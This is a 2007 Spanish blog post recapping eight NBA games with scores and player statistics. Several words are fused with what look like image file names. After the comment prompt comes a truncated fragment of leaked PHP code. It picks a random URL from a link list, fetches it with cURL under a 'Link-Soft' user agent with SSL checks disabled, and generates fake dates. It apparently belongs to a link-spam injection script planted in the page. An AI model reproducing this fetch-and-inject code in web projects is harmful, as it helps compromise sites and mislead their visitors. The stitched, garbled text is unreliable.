La crónica (17/12/07)

18 de December de 2007 por MagicJohnson32

En la crónica de hoy hablamos de las no-tan-sorprendentes victorias de Atlanta y Portland ante rivales de nivel y los dos partidazos que se jugaron anoche en Texas. Warriors y Grizzlies dieron espectáculo y Dunleavy dio la razón a los que han conservado la fe en él durante todo este tiempo. Mientras, Knicks y Bucks retomaron sus respectivas malas rachas tras un triunfo; aunque para mala racha, la de Minnesota, que suma ya 20 derrotas en 23 partidos.

 

Os dejamos con las crónicas de todos y cada uno de los partidos jugados anoche:

Jazz 111 – 116 Hawks

El proyecto de los Hawks sigue tomando forma. Anoche vencieron a los Jazz en un partido de alta anotación en el queboozermarvin brilló especialmente Carlos Boozer, con 39 puntos y 12 rebotes, pero en el que pudo más el gran día del quinteto inicial de Atlanta. Con la dirección de Anthony Johnson (14 asistencias), la intimidación de Josh Smith (5 tapones y 12 rebotes) y todos los titulares por encima de los 17 puntos, con Joe Johnson (26) a la cabeza, los Hawks fueron además capaces de frenar a Deron Williams, al que dejaron en 3 de 12 en tiros (aunque dio 10 asistencias). Los 19 puntos de Brewer, 16 de Kirilenko, 14 de Deron y 10 de Miles no fueron suficiente y los Jazz se quedan un partido por debajo de los Nuggets en la Northwest.

Bucks 99 – 104 Cavs

Ganar siempre es bueno: Mejora la dinámica del equipo, los jugadores rebosan confianza, los aficionados se van a casa contentos… Pero si encima ganas después de una mala racha, después de 2 prórrogas y ante tu público, eso… eso es la leche. Cleveland vivió ayer una de esas noches que cambian las tendencias de un equipo y liderados por Lebron James (31 puntos, 8 rebotes) y Zydrunas Ilgauskas (22 puntos, 11 rebotes) se impusieron a unos Bucks que también estaban muy necesitados de victorias. Por parte de los Milwaukee los mejores fueron 2 jugadores que se quedaron a un paso del triple doble: Michael Redd (22 puntos, 7 dunleavyknicksrebotes, 9 asistencias) y Mo Williams (18 puntos, 7 rebotes, 8 asistencias). Ahora a los de Wisconsin solo les queda buscar su noche soñada y cambiar la dinámica perdedora que arrastran en los últimos 10 partidos.

Pacers 119 – 92 Knicks

Hay un amigo nuestro que siempre ha creído en Mike Dunleavy. Ha soportado burlas, ofensas y comparaciones odiosas pero él ha mantenido su fe en uno de los jugadores más elegantes de la liga. Esta temporada Mike está destapando el tarro de las esencias y con actuaciones como la de ayer está dando la razón a todos los que confiaron en él. A mediados del tercer cuarto el partido llegó empatado a 64, pero en ese momento Dunleavy cogió las riendas de su equipos y con 22 puntos anotados en ese período catapultó a los Pacers a la victoria. Acabó el partido con 36 puntos, la mejor marca de su carrera. Jermaine O’Neal, Danny Granger y Troy Murphy anotaron más de 16 puntos cada uno, dotando al juego de Indiana de gran versativilidad. Por parte de los Knicks tan sólo Zach Randolph con 26 puntos tuvo una actuación destacada entre unos jugadores a los que ya critica incluso su propio entrenador. Después de esta derrota NYK se queda con un balance de 7 victorias y 17 derrotas, lejos seguramente de los planes de Isiah.

Wolves 87 – 91 Heat

Afortunadamente para Miami, su adversario eran los Minnesota Timberwolves, de largo el peor equipo de la NBA. Cualquier otro habría ganado este partido casi con seguridad. Para ver las claves del encuentro tenemos que observar las estadísticas y hacerlo con cuidado. Wade, 30 puntos. Cualquiera podría decir que prácticamente ha ganado el partido él sólo. Nada más lejos de la realidad. El problema de muchas estrellas de la NBA es que tienen una visión de juego bastante reducida. Y eso le ha debido de pasar a Wade hoy. Los 30 puntos los ha convertido con una serie de tiro horrenda, 6 de 22, y gracias a los 16 tiros libres que ha conseguido. 10 de esos fallos han sido consecutivos. Cualquiera de nosotros, pobres mortales, habría dejado de tirar. Wade, no. De esta forma, el partido lo han ganado para Miami otros dos jugadores. Y ninguno de ellos ha sido precisamente O’Neal, nuevamente expulsado por faltas. Han sido Haslem, que con 18 puntos y 16 rebotes ha hecho un gran partido, y Alonzo Mourning. Y en el lado contrario ellisnavarronuevamente Al Jefferson ha sido el jugador importante con 20 puntos y 20 rebotes, aunque de la misma forma, con malos porcentajes de tiro. El resto de Minnesota bastante espeso, aunque Telfair contribuyó con 17 puntos y 6 asistencias y McCants con 19 puntos pese a que no pudo participar en el sprint final por ser expulsado.

Warriors 125 – 117 Grizzlies

242 puntos anotaron entre Warriors y Grizzlies anoche en el FedExForum. La victoria, como era previsible, fue para los visitantes, que sacaron partido de sus recursos ofensivos y tuvieron a tres jugadores por encima de los 22 puntos. Liderados por Stephen Jackson, autor de 28 puntos, 12 rebotes y 5 asistencias, y con Baron Davis (22-8) y Monta Ellis (23-5-3) como principales escuderos, los Warriors abrieron brecha en el segundo y tercer cuarto. Los Grizzlies, de nuevo sin Gasol, no pudieron seguir el ritmo anotador de los californianos pese a los 40 puntos que lograron en el último cuarto y pese a los 87 anotados entre Gay, Miller, Lowry y Navarro, quien hizo 7 de 14 en tiros.

Magic 108 – 111 Mavs

La fortuna y Nowitzki se aliaron anoche para dar la victoria a los Mavericks ante los Magic. 31 puntos, 11 rebotes y 4 asistencias del alemán llevaron a los texanos al triunfo, que Keith Bogans pudo haber evitado si no hubiese pisado la línea en un lanzamiento lejano a pocos segundos para el final que los árbitros dieron correctamente de 2 puntos. El partido acabó en manos de Nowitzki pero empezó en las de Dwight Howard, que hizo 6 de 8 en tiros durante el primer cuarto. El reajuste defensivo de Avery Johnson, situando a Dampier sobre el pívot rival y ordenando dobles defensas continuas, permitió mantener bajo control a Howard, que finalizó con 9 de 16 para 22 puntos, 13 rebotes. Tukoglu anotóduncansunsdiaw 26 y sumó 6 rebotes y 4 asistencias, y Rashard Lewis añadió 15 con 8 rebotes. Por su parte, la mejor ayuda a Nowitzki la ofreció Stackhouse con 21 puntos, además de los 19 de Josh Howard y los 15 con 9 asistencias de Devin Harris.

Suns 100 – Spurs 95

Dirán que no, que sólo era un partido más, un intrascendente encuentro de regular season, que estamos en diciembre y lo que cuenta de verdad llegará dentro de 4-5 meses… pero los Suns querían, deseaban, necesitaban ganar ayer en pista de los Spurs. No es una venganza, y no lo será hasta que Phoenix elimine a San Antonio en unos Playoffs, pero el triunfo de los de Arizona en el AT&T Center puede ayudar a D’Antoni y los suyos a superar lo ocurrido en las pasadas semifinales de la Conferencia Oeste. El triunfo de los Suns llegó pese al descomunal partido de Tim Duncan, que demostró encontrarse en plena forma tras varios encuentros de baja y firmó 36 puntos, 17 rebotes y 3 asistencias. Pero Nash rozó el triple doble (10 puntos, 10 asistencias y 8 rebotes), Hill volvió a brillar con 22 puntos, 7 rebotes, 3 asistencias y 3 tapones y otros cinco suns lograron más de 9 puntos en un partido que registró 28 empates y en el que la ventaja cambió de manos 46 veces. Los Spurs, que volvieron a jugar sin Tony Parker, encajaron así su primera derrota como local de la temporada.

royblazershornetsHornets 76 – 88 Blazers

Ésta ya no nos ha pillado por sorpresa. Nos ha costado acostumbrarnos pero cuando un equipo gana siete partidos seguidos, es probable que llegue el octavo. Y llegó. Los Blazers siguen ganando y anoche lo hicieron ante los Hornets para lograr algo que no se veía en la franquicia de Oregon desde la 2002-2003. De nuevo liderados por Brandon Roy, excepcional durante esta racha y nombrado por segunda ocasión consecutiva como jugador de la semana del Oeste, los Blazers lograron imponerse en un partido gris, con porcentajes bajos y en el que decidió la inspiración. La de Roy, por supuesto, que finalizó con 24 puntos (10 de 17 en tiros) y 8 asistencias. Esta vez sólo Blake y Webster le acompañaron anotando en dobles figuras para Portland, mientras que por los Hornets destacó Chandler con 16 puntos sin fallo (8 de 8 en tiros) y 19 rebotes, 12 de ellos ofensivos. West anotó 21 puntos y Chris Paul no brilló tanto como en otras ocasiones al quedarse en 11 puntos y 8 asistencias. Los Blazers sitúan ya su balance en positivo, 13-12, e incluso miran de cerca al líder de la Northwest, los Nuggets (14-10).

Esta entrada no tiene comentarios... pero tú puedes ser el primero.

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>